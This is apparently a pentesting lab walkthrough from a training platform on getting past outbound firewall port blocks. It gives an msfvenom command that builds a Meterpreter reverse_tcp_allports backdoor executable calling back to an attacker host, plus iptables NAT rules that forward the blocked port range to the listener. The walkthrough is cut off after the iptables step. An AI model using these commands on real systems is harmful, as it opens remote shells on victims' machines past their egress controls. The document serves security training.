walkthrough-2328.pdf

(1769 KB) Pobierz

Name

URL

Type

Firewall Bypass: Automatic Outbound Open Port Detection

https://attackdefense.com/challengedetails?cid=2328

Basic Exploitation: Pentesting

Important Note:

This document illustrates all the important steps required to complete this lab.

This is by no means a comprehensive step-by-step solution for this exercise. This is only

provided as a reference to various commands needed to complete this exercise and for your

further research on this topic. Also, note that the IP addresses and domain names might be

different in your lab.

Switch to “Target Machine”

Step 1:

Verify Windows firewall outbound port configuration.

Open “Windows Defender Firewall with Advanced Security”

We can notice Outbound ports 4444 to 6009 are blocked. In other scenarios, the port range

could be different. So, the objective of this challenge is to gain a reverse shell using

windows/meterpreter/reverse_tcp_allports payload.

About reverse_tcp_allports payload:

“”Inject the meterpreter server DLL via the Reflective DLL Injection payload (staged). Try to

connect back to the attacker, on all possible ports (1-65535, slowly)””

Source:

https://www.rapid7.com/db/modules/payload/windows/meterpreter/reverse_tcp_allports/

Step 2:

Generating reverse_tcp_allports payload.

Command:

sudo msfvenom -p windows/meterpreter/reverse_tcp_allports LHOST=10.0.31.200

LPORT=4444 -f exe > backdoor.exe

We have generated a reverse_tcp_allports and when we run the backdoor.exe on the target

machine it will try to connect back to the attacker machine from port 4444 and not from port 1.

Because we have mentioned the LPORT to 4444, so it will starts from there.

Step 3:

In this scenario, we know that from range port 4444 to 6009 are blocked. So we need to

set an iptables rule on the attacker machine which will forward port 6010 connection to port

4444 and this is where our Metasploit multi handler is listening for the reverse connection.

Applying iptable rules on the attacker machine.

Command:

sudo iptables -A PREROUTING -t nat -i eth0 -p tcp --dport 4444:6010 -j DNAT --to-destination

10.0.31.200:4444

sudo iptables --table nat --list